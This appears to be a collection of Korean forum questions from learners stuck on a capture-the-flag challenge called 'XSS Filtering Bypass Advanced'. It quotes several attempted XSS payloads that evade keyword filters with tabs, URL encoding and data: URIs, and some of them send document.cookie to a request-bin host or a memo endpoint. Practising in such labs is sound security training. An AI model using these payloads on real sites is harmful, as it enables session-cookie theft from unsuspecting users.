XSS Filtering Bypass Advanced

on이나 script만 우회하면 될것 같은데 아무리 찾아봐도 잘 모르겠네용... 힌트 좀 주시면 감사하겠습니다

강의에서 본 <iframe src="\1\4jAVasC\triPT:alert(document.domain)">처럼 사용을 해보았으나 안됩니다.. script나 on 키워드를 우회하려면 어느 부분을 공부해 봐야 할까요? location이나 document는 javascript 스키마를 이용해서 했는데 중요한 script나 on 우회 방법을 모르겠습니다.

iframe 태그를 사용해서 javascript: 이런 형태로 필터링 단어는 정규화과정을 통해 우회하였습니다. 이후 memo=document.cookie의 값을 입력하여 전송했을때 제 테스트 쿠키로 vuln에서 테스트 할경우에는 쿠키값이 출력되는데 flag를 통해서 전송했을때는 왜 안보일까요..?

<embed src="data:text/html; base64 ... 를 이용해 문제를 해결하는 중인데 상위 페이지의 cookie값을 가져오지 못하고 있습니다. 제가 문제 방향을 이상하게 잡은건가요 ? 또 다른 방법이 있을까요..

iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요, iframe src="javascri%09pt:locatio%09n.href=%27구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고 flag 페이지에선 아무것도 전송되지 않습니다... <iframe srcdoc 로는 javascript: 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ

vuln 페이지 쿼리에 document.cookie를 보냈는데 memo에 PHPSESSID=random 이런식으로 세션 아이디가 그대로 찍히네요 드림핵 툴즈를 사용해서 푸는 방법 말고, memo에서도 풀어보고 싶습니다 제 방법이 잘못 된걸까요???

<iframe src=“javascri pt:locatio n.href=‘https://XXXXX.request.dreamhack.games/?memo=’+d ocument.cookie”> <iframe src=“javascri` pt:locatio n.href=‘/memo?memo=’+d ocument.cookie”> 이런식으로 bypass를 했는데 filtered!!!가 안뜨긴 하는데 계속 ` Not Found The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again. ` 가 계속 나옵니다... 왜 이러는지 알려 주실 수 있나요..?

개인적인 궁금증인데 이 문제에서 내장함수 사용은 안 되는건가요? 그냥 배운거 써보고 싶어서 alert(1) 띄울 때 <iframe src=”javasc%09ript:alert+URL+0[12]+1+URL+0[13]"> 위와 같이 썼는데 안 되더라구요

javascript: 스키마를 사용하려 했는데 여기서 javascript는 Unicode escape sequence로 우회하면 안되는 건가요?

<img src=x o%2509nerror="locatio%2509n.href='/memo?memo='%252Bdo%2509cument.cookie"> tab(%09)문자를 더블 url 인코딩 이용해서 필터링되는 문자열 사이에 넣어서 우회구문을 작성했는데 막혔습니다.. 어떻게 접근하는것이 좋을까요?